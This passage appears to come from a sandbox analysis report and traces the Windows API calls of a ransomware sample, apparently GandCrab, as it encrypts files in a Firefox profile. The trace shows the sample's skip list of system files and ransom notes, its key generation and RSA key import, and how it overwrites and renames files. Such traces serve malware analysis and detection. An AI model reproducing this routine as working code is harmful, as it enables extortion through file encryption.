(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d2ca4a09d2ca4deb61a.lock") returned 126 [0083.833] lstrlenW (lpString=".lock") returned 5 [0083.833] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.833] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".lock ") returned 6 [0083.833] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.833] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.833] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0083.833] lstrcmpW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2=".") returned 1 [0083.833] lstrcmpW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="..") returned 1 [0083.834] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\", lpString2="d896fec9-1a7a-4db1-a3a2-e46d95b631a5" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5" [0083.834] lstrlenW (lpString=".titwmvjl") returned 9 [0083.834] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5") returned 138 [0083.834] VirtualAlloc (lpAddress=0x0, dwSize=0x154, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.834] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5.titwmvjl") returned 147 [0083.834] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5") returned 138 [0083.834] lstrlenW (lpString=".default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5") returned 67 [0083.834] VirtualAlloc (lpAddress=0x0, dwSize=0x8a, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.834] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5 ") returned 68 [0083.834] lstrcmpiW (lpString1=".default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2=".titwmvjl") returned -1 [0083.834] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.835] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5") returned 138 [0083.835] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5") returned 138 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="desktop.ini") returned -1 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="autorun.inf") returned 1 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="ntuser.dat") returned -1 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="iconcache.db") returned -1 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="bootsect.bak") returned 1 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="boot.ini") returned 1 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="ntuser.dat.log") returned -1 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="thumbs.db") returned -1 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="KRAB-DECRYPT.html") returned -1 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="CRAB-DECRYPT.html") returned 1 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="KRAB-DECRYPT.txt") returned -1 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="CRAB-DECRYPT.txt") returned 1 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="ntldr") returned -1 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="NTDETECT.COM") returned -1 [0083.835] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="Bootfont.bin") returned 1 [0083.835] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5") returned 138 [0083.835] lstrlenW (lpString=".default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5") returned 67 [0083.835] VirtualAlloc (lpAddress=0x0, dwSize=0x8a, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.835] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5 ") returned 68 [0083.836] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.836] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.836] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x248 [0083.837] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.837] ReadFile (in: hFile=0x248, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e4f8*=0x21c, lpOverlapped=0x0) returned 1 [0083.848] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.848] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.848] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0083.852] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.852] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.852] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.852] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e4b4 | out: pbBuffer=0x259e4b4) returned 1 [0083.852] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.853] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.853] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.853] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0083.856] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.857] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.857] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.857] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e4d4 | out: pbBuffer=0x259e4d4) returned 1 [0083.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.857] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.857] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.858] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.858] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0083.861] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.861] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x5032f8) returned 1 [0083.861] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.862] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0083.862] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.862] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e44c*=0x100) returned 1 [0083.862] GetLastError () returned 0x0 [0083.862] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.863] CryptDestroyKey (hKey=0x5032f8) returned 1 [0083.863] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.863] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.863] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.863] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0083.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.867] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x5033b8) returned 1 [0083.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.867] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0083.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.868] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e44c*=0x100) returned 1 [0083.868] GetLastError () returned 0x0 [0083.868] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.868] CryptDestroyKey (hKey=0x5033b8) returned 1 [0083.868] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.868] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.868] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0083.869] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0083.869] ReadFile (in: hFile=0x248, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e4f8*=0x29c5, lpOverlapped=0x0) returned 1 [0083.885] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xffffd63b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.885] WriteFile (in: hFile=0x248, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x29c5, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e4dc*=0x29c5, lpOverlapped=0x0) returned 1 [0083.890] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.890] WriteFile (in: hFile=0x248, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e4dc*=0x21c, lpOverlapped=0x0) returned 1 [0083.892] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.896] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.897] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.897] CloseHandle (hObject=0x248) returned 1 [0083.897] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5.titwmvjl"), dwFlags=0x1) returned 1 [0083.898] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.898] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0083.898] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0083.898] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0083.898] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\TITWMVJL-DECRYPT.txt" [0083.898] lstrlenW (lpString=".titwmvjl") returned 9 [0083.898] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\TITWMVJL-DECRYPT.txt") returned 122 [0083.898] VirtualAlloc (lpAddress=0x0, dwSize=0x134, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.898] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 131 [0083.898] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\TITWMVJL-DECRYPT.txt") returned 122 [0083.898] lstrlenW (lpString=".txt") returned 4 [0083.898] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.899] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".txt ") returned 5 [0083.899] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0083.899] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.899] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\TITWMVJL-DECRYPT.txt") returned 122 [0083.899] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\TITWMVJL-DECRYPT.txt") returned 122 [0083.899] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0083.899] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0083.899] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0083.899] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0083.899] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0083.899] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0083.899] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0083.899] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0083.899] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.899] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0083.899] FindClose (in: hFindFile=0x5035b8 | out: hFindFile=0x5035b8) returned 1 [0083.900] CloseHandle (hObject=0x2d4) returned 1 [0083.900] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0083.900] lstrcmpW (lpString1="search.json.mozlz4", lpString2=".") returned 1 [0083.900] lstrcmpW (lpString1="search.json.mozlz4", lpString2="..") returned 1 [0083.900] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="search.json.mozlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4" [0083.900] lstrlenW (lpString=".titwmvjl") returned 9 [0083.900] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4") returned 98 [0083.900] VirtualAlloc (lpAddress=0x0, dwSize=0x104, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.900] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4.titwmvjl") returned 107 [0083.901] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4") returned 98 [0083.901] lstrlenW (lpString=".mozlz4") returned 7 [0083.901] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.901] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".mozlz4 ") returned 8 [0083.901] lstrcmpiW (lpString1=".mozlz4", lpString2=".titwmvjl") returned -1 [0083.901] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.901] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4") returned 98 [0083.901] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4") returned 98 [0083.901] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="desktop.ini") returned 1 [0083.901] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="autorun.inf") returned 1 [0083.901] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="ntuser.dat") returned 1 [0083.901] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="iconcache.db") returned 1 [0083.901] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="bootsect.bak") returned 1 [0083.901] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="boot.ini") returned 1 [0083.901] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="ntuser.dat.log") returned 1 [0083.901] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="thumbs.db") returned -1 [0083.901] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0083.901] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0083.901] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="KRAB-DECRYPT.html") returned 1 [0083.901] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="CRAB-DECRYPT.html") returned 1 [0083.901] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="KRAB-DECRYPT.txt") returned 1 [0083.901] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="CRAB-DECRYPT.txt") returned 1 [0083.901] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="ntldr") returned 1 [0083.901] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="NTDETECT.COM") returned 1 [0083.902] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="Bootfont.bin") returned 1 [0083.902] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4") returned 98 [0083.902] lstrlenW (lpString=".mozlz4") returned 7 [0083.902] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.902] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".mozlz4 ") returned 8 [0083.902] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.902] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.902] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\search.json.mozlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0083.903] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.903] ReadFile (in: hFile=0x2d4, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0083.920] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.920] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.920] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0083.922] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.923] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.923] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.923] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0083.923] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.923] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.923] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.923] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.923] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0083.926] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.926] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.926] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.926] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0083.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.926] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.926] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.927] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0083.930] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.930] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503938) returned 1 [0083.930] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.930] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0083.930] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 